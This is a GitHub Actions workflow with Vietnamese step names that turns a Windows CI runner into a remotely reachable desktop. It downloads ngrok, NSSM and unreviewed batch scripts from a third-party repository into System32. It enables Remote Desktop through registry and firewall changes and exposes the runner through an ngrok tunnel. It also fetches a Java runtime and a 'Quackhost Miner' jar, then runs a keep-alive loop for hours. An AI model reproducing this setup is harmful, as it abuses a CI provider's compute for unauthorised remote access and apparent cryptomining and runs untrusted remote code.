name: CI

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Tải Ngrok và NSSM
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/geenzogamer/Ngrok-Exe/master/ngrok.exe -OutFile ngrok.exe
        Invoke-WebRequest https://raw.githubusercontent.com/geenzogamer/gettovds/main/Files/nssm.exe -OutFile nssm.exe
    - name: Sao chép NSSM và Ngrok vào thư mục Windows
      run: | 
        copy nssm.exe C:\Windows\System32
        copy ngrok.exe C:\Windows\System32
    - name: Kết nối đến tài khoản Ngrok của bạn
      run: .\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Tải xuống tệp quan trọng
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/geenzogamer/gettovds/main/Files/NGROK-US.bat -OutFile NGROK-US.bat
        Invoke-WebRequest https://raw.githubusercontent.com/geenzogamer/gettovds/main/Files/NGROK-CHECK.bat -OutFile NGROK-CHECK.bat
        Invoke-WebRequest https://raw.githubusercontent.com/geenzogamer/gettovds/main/Files/loop.bat -OutFile loop.bat
    - name: Thiết lập tệp yml cho Ngrok
      run: start NGROK-US.bat
    - name: Bật quyền kết nối
      run: | 
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Tạo kết nối
      run: sc start ngrok
    - name: Thông tin kết nối
      run: cmd /c NGROK-CHECK.bat
    - name: Tải java và Quackhost Miner
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/geenzogamer/gettovds/main/Files/jre-8u291-windows-i586-iftw.exe -OutFile jre-8u291-windows-i586-iftw.exe
        Invoke-WebRequest https://raw.githubusercontent.com/geenzogamer/gettovds/main/Files/QuackhostMiner-1.61.jar -OutFile QuackhostMiner-1.61.jar
    - name: Đã hoàn thành! Cấu hình 2-7 Thời gian 6 giờ
      run: cmd /c loop.bat 
      
    
